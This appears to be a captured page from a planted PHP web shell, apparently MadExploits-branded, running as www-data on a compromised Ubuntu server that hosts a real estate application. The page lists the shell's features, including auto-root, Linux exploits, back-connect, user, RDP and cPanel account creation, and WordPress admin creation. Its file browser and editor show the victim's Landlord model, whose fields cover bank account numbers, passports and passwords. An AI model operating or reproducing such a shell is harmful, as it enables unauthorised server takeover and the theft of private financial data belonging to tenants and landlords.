Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.63.128
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
realestate /
source /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
AlertMethod.php
182
B
-rwxr-xr-x
Applicant.php
2.98
KB
-rwxr-xr-x
ApplicantFile.php
362
B
-rwxr-xr-x
ApplicantPreset.php
315
B
-rw-r--r--
ApplicantUserDetail.php
669
B
-rwxr-xr-x
Area.php
480
B
-rwxr-xr-x
Branch.php
2.25
KB
-rwxr-xr-x
BuyType.php
237
B
-rwxr-xr-x
Category.php
505
B
-rwxr-xr-x
Country.php
464
B
-rwxr-xr-x
Directory.php
1.4
KB
-rwxr-xr-x
DirectoryAddress.php
624
B
-rwxr-xr-x
DirectoryAttachment.php
424
B
-rwxr-xr-x
DirectoryCustomField.php
191
B
-rwxr-xr-x
Label.php
412
B
-rwxr-xr-x
Landlord.php
2.08
KB
-rwxr-xr-x
LandlordUserDetail.php
665
B
-rwxr-xr-x
Landlordfile.php
357
B
-rwxr-xr-x
LettingsPW.php
309
B
-rwxr-xr-x
Module.php
578
B
-rwxr-xr-x
OccupierType.php
242
B
-rwxr-xr-x
PostalCode.php
180
B
-rwxr-xr-x
PropertyAlert.php
481
B
-rwxr-xr-x
PropertyType.php
316
B
-rwxr-xr-x
Source.php
408
B
-rwxr-xr-x
SpecialFeature.php
432
B
-rwxr-xr-x
User.php
1.09
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Landlord.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class Landlord extends Model { use HasFactory; protected $fillable = [ 'landlord', 'type', 'vendor', 'dob', 'website', 'birth_place', 'pager', 'feedback_notification', 'nationality', 'passport_no', 'lha_dwp', 'solicitor', 'status', 'negotiator_id', 'assigned_to', 'lead_source', 'repairs', 'is_buy', 'sole_sale_fee', 'sole_sale_fee_unit', 'sole_finder_fee', 'sole_finder_fee_unit', 'management_finder_fee', 'management_finder_fee_unit', 'multi_sale_fee', 'multi_sale_fee_unit', 'multi_finder_fee', 'multi_finder_fee_unit', 'multi_management_finder_fee', 'multi_management_finder_fee_unit', 'olt', 'nrl_rate', 'nrl_ref', 'vat_number', 'supplier_1', 'supplier_2', 'supplier_3', 'comments', 'other_info', 'bym_status', 'notify_property_alerts', 'notify_general_news', 'notify_special_offers', 'notify_phone', 'notify_email', 'notify_sms', 'notify_post', 'bank_body', 'bank_account_no', 'bank_sort_code', 'bank_account_name', 'bank_beneficiary_reference', 'bank_address_line_1', 'bank_address_line_2', 'bank_town', 'bank_county', 'bank_postcode', 'bank_country', 'iban', 'bic', 'nib', 'username', 'password', ]; public function firstlandlordUserDetail() { return $this->hasOne(LandlordUserDetail::class, 'landlord_id')->oldest(); } public function landlordUserDetails() { return $this->hasMany(LandlordUserDetail::class, 'landlord_id'); } public function landlordFiles() { return $this->hasMany(Landlordfile::class, 'landlord_id'); } }
Close